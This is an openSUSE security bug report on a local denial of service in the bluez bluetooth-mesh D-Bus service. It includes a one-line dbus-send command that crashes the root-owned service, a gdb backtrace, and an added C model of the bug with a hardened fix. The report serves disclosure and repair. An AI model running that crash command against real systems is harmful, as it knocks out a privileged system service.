Bug ID | 1152672 |
---|---|
Summary | VUL-0: bluez: bluetooth-mesh D-Bus service can be crashed by regular user |
Classification | openSUSE |
Product | openSUSE Tumbleweed |
Version | Current |
Hardware | Other |
OS | Other |
Status | NEW |
Severity | Normal |
Priority | P5 - None |
Component | Security |
Assignee | seife@novell.slipkontur.de |
Reporter | matthias.gerstner@suse.com |
QA Contact | qa-bugs@suse.de |
CC | matthias.gerstner@suse.com, vbotka@suse.com |
Blocks | 1151518 |
Found By | --- |
Blocker | --- |
+++ This bug was initially created as a clone of Bug #1151518 +++

The new bluetooth-mesh D-Bus service which is reviewed in bug 1151518 has a DoS vulnerability that allows a regular user to crash the root-owned D-Bus service. To do so the following D-Bus call can be employed:

```shell
$ dbus-send --system --type=method_call --print-reply --dest=org.bluez.mesh /org/bluez/mesh org.bluez.mesh.Network1.Join objpath:/org/gnome/DisplayManager array:byte:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
```

After a timeout of about 20 seconds the D-Bus service will crash due to a null pointer dereference with the following backtrace:

```text
node_init_cb (node=0x0, agent=0x0) at mesh/mesh.c:359
359         reply = dbus_error(join_pending->msg, MESH_ERROR_FAILED,
(gdb) bt
    user_data=0x5555555be170) at mesh/node.c:1760
    dbus=<optimized out>) at ell/dbus.c:216
    user_data=0x5555555a6e00) at ell/dbus.c:279
    user_data=0x5555555a7ef0) at ell/io.c:126
    at ell/main.c:642
    at mesh/main.c:205
```

The reason is probably that the `join_pending` data structure has already been freed in a different function.
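As an added illustration (not bluez code and not part of the report): a hypothetical C model of the failure mode the reporter suspects, a timer-driven completion callback that runs after the pending request state it replies through has already been torn down, beside the hardened shape that cancels the timer on teardown and guards the callback against missing state. Every name here (`join_request`, `start_join`, `fire_timeout`, `run_scenario`, the `CB_*` codes) is an assumption; the only values taken from the report are the `node=0x0, agent=0x0` callback arguments, the object path and the 16-byte array. A real NULL dereference is modelled as a returned code so the model can run and be tested.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical model of a pending Join request (not bluez's struct). */
struct join_request {
    uint8_t uuid[16];      /* device UUID supplied by the caller */
    char agent_path[64];   /* D-Bus object path of the provisioning agent */
};

/* Outcome of the completion callback. A real NULL dereference is
 * modelled as CB_WOULD_CRASH instead of actually faulting. */
enum cb_result { CB_REPLIED_OK = 0, CB_REPLIED_FAILED, CB_IGNORED_STALE, CB_WOULD_CRASH };

static struct join_request *join_pending; /* global, like the report's join_pending */
static bool join_timer_armed;             /* stands in for a live timeout handle */

/* Record the request and arm the completion timer. */
static void start_join(const uint8_t uuid[16], const char *agent_path)
{
    join_pending = calloc(1, sizeof(*join_pending));
    memcpy(join_pending->uuid, uuid, 16);
    snprintf(join_pending->agent_path, sizeof(join_pending->agent_path), "%s", agent_path);
    join_timer_armed = true;
}

/* Suspected original shape: tear down the state but leave the timer armed. */
static void free_pending_unsafe(void)
{
    free(join_pending);
    join_pending = NULL;
}

/* Hardened shape: disarm the timer before the state goes away, so a late
 * completion has nothing to run against. */
static void free_pending_safe(void)
{
    join_timer_armed = false;
    free(join_pending);
    join_pending = NULL;
}

/* Callback modelled on node_init_cb(node, agent): on failure it replies
 * through join_pending without checking that it still exists. */
static enum cb_result node_init_cb_unsafe(const void *node, const void *agent)
{
    if (!node || !agent) {
        /* Real code reads join_pending->msg here; with join_pending already
         * NULL that read is the NULL pointer dereference in the backtrace. */
        if (!join_pending)
            return CB_WOULD_CRASH;
        return CB_REPLIED_FAILED;
    }
    return CB_REPLIED_OK;
}

/* Guarded callback: a completion with no pending request is simply dropped. */
static enum cb_result node_init_cb_safe(const void *node, const void *agent)
{
    if (!join_pending)
        return CB_IGNORED_STALE;
    if (!node || !agent)
        return CB_REPLIED_FAILED;
    return CB_REPLIED_OK;
}

/* Timer expiry: no agent at the given path ever answered, so the callback
 * receives node=NULL, agent=NULL as in the reported crash. */
static enum cb_result fire_timeout(enum cb_result (*cb)(const void *, const void *))
{
    if (!join_timer_armed)
        return CB_IGNORED_STALE;
    join_timer_armed = false;
    return cb(NULL, NULL);
}

/* The reported sequence: Join with a path no mesh agent serves, pending
 * state freed elsewhere, then the ~20 s timer fires. */
enum cb_result run_scenario(bool hardened)
{
    static const uint8_t uuid[16] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
    start_join(uuid, "/org/gnome/DisplayManager");
    if (hardened)
        free_pending_safe();
    else
        free_pending_unsafe();
    return fire_timeout(hardened ? node_init_cb_safe : node_init_cb_unsafe);
}

/* Ordinary failure: pending state still intact when the timer fires, so the
 * caller gets an error reply and the request is then cleaned up. */
enum cb_result run_normal_failure(void)
{
    static const uint8_t uuid[16] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
    start_join(uuid, "/org/gnome/DisplayManager");
    enum cb_result r = fire_timeout(node_init_cb_safe);
    free_pending_safe();
    return r;
}

int main(void)
{
    printf("unsafe: %d (3 = would crash)\n", run_scenario(false));
    printf("hardened: %d (2 = stale completion ignored)\n", run_scenario(true));
    printf("normal failure: %d (1 = error reply sent)\n", run_normal_failure());
    return 0;
}
```

The two hardening steps are independent: cancelling the timer on teardown prevents the late callback from running at all, and the guard inside the callback covers any other path that reaches it with the state already gone. A service that does both keeps a stray completion from becoming a crash of a root-owned process.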